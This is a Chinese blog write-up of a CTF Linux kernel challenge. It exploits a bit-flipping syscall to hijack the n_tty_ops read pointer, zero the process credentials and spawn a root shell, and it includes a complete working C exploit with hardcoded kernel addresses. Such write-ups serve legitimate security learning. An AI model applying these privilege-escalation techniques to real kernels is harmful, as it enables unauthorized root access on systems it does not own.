linux内核pwn,Linux内核pwn——劫持n_tty_ops指针

最新推荐文章于 2023-04-12 16:11:57 发布
最新推荐文章于 2023-04-12 16:11:57 发布
阅读量303 收藏 1
点赞数
文章标签: linux内核pwn

172250

0x001 前言

以往多数的kernel pwn题都是基于内核扩展模块的漏洞分析,今天我们来看2018年Midnight Sun CTF一个无*.ko内核模块的题。

题目下载:

0x002 干掉定时logout

由于内核运行一断时间后便会退出,需要解开文件系统,做一定修改

mkdir core

mv ./core.cpio ./core/

cd core

cpio -idmv < initrd

rm initrd

一般的,我们会去看init文件,但貌似并没有问题

172250

最后,我找到了/home/flitbip下的.profile文件,将第1、2行注释掉

172250

为了后续调试方便,我在根目录新建一个tmp文件夹,在init作如下改动,让启动的内核具有root权限

172250

重新打包

find . -print0 | cpio --null -ov --format=newc > core.cpio

mv ./core.cpio ..

rm -rf ../core

0x003 分析

由init看得出来,内核启动过程并未加载任何与题目相关的内核扩展模块,但src目录下有一个flitbip.c文件

172250

这里定义了一个系统调用(系统调用号为333),会将参数addr的第bit位翻转

留意到flit_cout必须要小于MAXFLIT = 1,否则便会退出

172250

绕过方法:

flit_cout是有符号长整型,调用一次系统调用flitbip,将flit_cout最高位翻转,此时flit_cout为负数。

long flitbip(long *addr, long bit)

{

__asm__("mov rax, 333;"

"syscall;"

);

}

int main()

{

...

flitbip(flit_count, 63);

...

}

先调试看看是否已经绕过,用extract-vmlinux提取内核执行文件

172250

当我看到这样的情况,我是一脸懵逼的

172250

估计是generic版的内核,好吧…只能去/proc/kallsyms找了

/tmp # cat /proc/kallsyms | grep flit_count

ffffffff818f4f78 B flit_count

EXP执行前

172250

EXP执行后,看样子flit_count翻转成负数了

172250

下面考虑如何提权:

内核中存在n_tty_ops这个全局指针,其指向的这片地存储着许多函数指针,我们想办法将该处的函数指针改成我们root函数的地址,再触发该函数。

172250

n_tty_ops指向的函数指针

172250

最后,我们利用含有漏洞333号系统调用,将n_tty_read劫持成root函数提权,n_tty_read存储在*n_tty_ops + 0x30

0x004 ROOT

由于没有开aslr,直接将n_tty_ops等地址写死即可

完整的EXP

// gcc solved.c -static -masm=intel -g -o solved

#include

#include

unsigned long *flit_count = 0xffffffff818f4f78;

unsigned long *n_tty_read = 0xffffffff810c8510;

unsigned long *n_tty_ops = 0xffffffff8183e320;

unsigned long *current_task = 0xffffffff8182e040;

unsigned long user_cs, user_ss, user_rflags, user_sp;

void save_status()

{

__asm__("mov %0, cs;"

"mov %1, ss;"

"mov %2, rsp;"

"pushfq;"

"popq %3;"

:"=r"(user_cs),"=r"(user_ss),"=r"(user_sp),"=r"(user_rflags)

:

:"memory"

);

puts("[*]status has been saved.");

}

void binsh()

{

if(!getuid())

{

system("/bin/sh");

}

else

{

puts("[*]spawn shell error!");

}

exit(0);

}

long flitbip(long *addr, long bit)

{

__asm__("mov rax, 333;"

"syscall;"

);

}

void root()

{

int *cred = *(unsigned long *)((char *)*current_task + 0x3c0);

for(int i = 1; i < 9; i++)

cred[i] = 0;

*(unsigned long *)((char *)n_tty_ops + 0x30) = (unsigned long)n_tty_read;

__asm__("swapgs;"

"mov rax, %0;"

"push rax;"

"mov rax, %1;"

"push rax;"

"mov rax, %2;"

"push rax;"

"mov rax, %3;"

"push rax;"

"mov rax, %4;"

"push rax;"

"iretq;"

:

:"r"(user_ss),"r"(user_sp),"r"(user_rflags),"r"(user_cs),"r"(binsh)

:"memory"

);

}

int main()

{

save_status();

printf("user_sp addr: %pn", user_sp);

flitbip(flit_count, 63);

unsigned long xor = (unsigned long)root ^ (unsigned long)n_tty_read;

printf("root addr: %lxn", root);

printf("root xor: %lxn", xor);

for(unsigned long i = 0; i < 64; i++)

{

if(xor & (1ULL << (i)))

flitbip((char *)n_tty_ops + 0x30, i);

}

scanf("%c", user_sp);

while(1);

return 0;

}

root~

172250

麦克羊
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ttywatcher-1.2针对单一主机上的连接的TCP劫持工具
12-29
TTY Watcher 免费程序,针对单一主机上的连接 压缩包内含源码
linux内核pwn,Pwn In Kernel(一):基础知识
weixin_39772566的博客
04-29 450
Kernel Pwn In CTF简单分析一下 CTF Kernel Pwn 题目的形式,以 2017 CISCN babydrive 为例。先对文件包解压➜ example lsbabydriver.tar➜ example file babydriver.tarbabydriver.tar: POSIX tar archive➜ example tar -xvf babydriver.t...
利用linux内核模块实现TTY hijacking
crond123的专栏
07-08 897
<br />          ============================================<br />                        利用linux内核模块实现TTY hijacking<br />               译:大鹰<e4gle@hackermail.com ><br />           ============================================<br /> 简介<br /> ---------
Linux 内核PWN基础手法(不定期更新)
a2590035252的博客
11-23 286
ret2usr 攻击利用了 用户空间的进程不能访问内核空间,但内核空间能访问用户空间 这个特性来定向内核代码或数据流指向用户控件,以 ring 0 特权执行用户空间代码完成提权等操作。
Linux--tty
最新发布
null_one的博客
04-12 843
Linux--tty
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
linux kernel pwn学习之UAF
seaaseesa的博客
02-29 1329
Linux Kernel UAF 与用户态下的glibc差不多,都是对已经释放的空间未申请就直接使用,内核的UAF往往是出现在多线程多进程多文件的情况下。即,假如某个用户程序对用一个内核驱动文件打开了两次,有两个文件描述符,它们都指向了该驱动,又因为是在同一个程序里,所以当我们释放掉其中一个文件描述符后,还可以使用另一个文件描述符来操控驱动。 为了加深理解,我们就以一题为例 ciscn201...
Linuxpwn从入门到放弃
热门推荐
一个码农的笔记
12-15 1万+
0x0 简介 pwn,在安全领域中指的是通过二进制/系统调用等方式获得目标主机的shell。 虽然web系统在互联网中占有比较大的分量,但是随着移动端,ioT的逐渐流行,传统的缓冲区溢出又一次有了用武之处 0x01 工欲善其事,必先利其器 Linux下的pwn常用到的工具有: (1)gdb:Linux调试中必要用到的 (2)gdb-peda:gdb方便调试的工具,类似的工具有gef,gd
Linux PWN从入门到熟练
墨痕诉清风的博客
07-19 1729
最近在复习pwn的一些知识。主要涉及到当堆栈开启了保护的时候,我们不能够直接将shellcode覆盖到堆栈中执行,而需要利用程序其他部分的可执行的小片段来连接成最终的shellcode。此小片段就是gadgets。本文主要通过练习题的方式讲述如何寻找gadgets,如何利用现有的工具来加速自己的pwn的效率。Gadgets的类型和难度也逐步变化。下面带来手把手教你linux pwn。让你的pwn技术从入门到熟练。练习题的难度逐步加大。
PWN概论
m0_52249553的博客
05-06 6889
什么是pwn pwn是ctf解题赛中的一个题目类别,它在黑客俚语中代表着攻破,获取权限,由“own”这个词引申而来。在CTF比赛中它代表着溢出类的题目,常见的类型有整数溢出、栈溢出、堆溢出等。主要考查参赛选手对漏洞的利用能力。 学习pwn的知识储备 反汇编工具 在比赛中我们会拿到一个二进制文件(由c文件编译而来),我们要找出这个可执行文件的漏洞,但二进制文件是由0和1的机器码组成,正常人是直接无法看懂里面的内容的,这时我们需要利用反编译工具将这个二进制文件反编译为我们能看懂的语言(汇编语言或者c语言
linux内核pwn,[原创]linux kernel pwn 分析(一) 强网杯core + ciscn babydriver
weixin_42588672的博客
04-29 518
通用的提权代码是commit_creds(prepare_kernel_cred(0));这两个函数如何动态获得?借助/proc/kallsyms符号表,在运行时动态读取。这个很容易实现,贴出一例:unsigned long find_symbol_by_proc(char *file_name, char *symbol_name){FILE *s_fp;char buff[200] = {0}...
[Jarvis OJ - PWN]——Test Your Memory
Y_peak的博客
02-16 218
[Jarvis OJ - PWN]——Test Your Memory 题目地址: https://www.jarvisoj.com/challenges 题目: 32位程序,开了NX保护 IDA exploit from pwn import * #p = process("./memory") p = remote("pwn2.jarvisoj.com",9876) context.log_level = 'debug' cat_flag_addr = 0x080487E0 sys_ad
UART子系统(三) UART属于TTY体系之一
da.的博客
04-26 1019
文章目录TTY体系中设备节点的差别1. 傻傻分不清2. 要讲历史了2.1 电传机teletype2.2 计算机需要控制2.2.1 使用teletype2.2.2 teletype被淘汰了2.2.3 个人电脑和虚拟终端3. 在Ubuntu上演示3.1 各类设备节点的差别3.2 /dev/ttyN(N=1,2,3,...)3.3 /dev/tty03.4 /dev/tty3.5 Terminal和Console的差别3.6 /dev/console UART属于TTY体系的一部分,所以介绍一下TTYTTY
Linux tty驱动学习 - UART驱动的write操作流程
sbctsp的博客
01-06 8037
tty核心层到最后把数据写入到硬件,整个操作流程如下:tty_write() -> do_tty_write() -> n_tty_write() -> uart_write() -> serial8250_start_tx() -> serial_out()。也就是从tty核心层到线路规程,然后到tty驱动层,再到UART驱动层,最后到UART端口的输出寄存器中。 首先看tty核心的写操作t
Pwn笔记
caterpillarous的博客
04-18 2632
Pwn笔记 -前言 以下内容摘自Wiki: Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。 在骇客行话里,尤其在另外一种电脑技术方面,包括电脑(服务器或...
Linux pwn零基础入门教程:环境配置到实战攻击
"i春秋月刊第六期的主题深入探讨了Linux pwn(Privilege Escalation,权限提升)的零基础入门教程。该系列由Tangerine@SAINTSEC作者撰写,历时三个月精心编撰,旨在解决新手在Linux环境下攻破安全挑战时遇到的难题,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值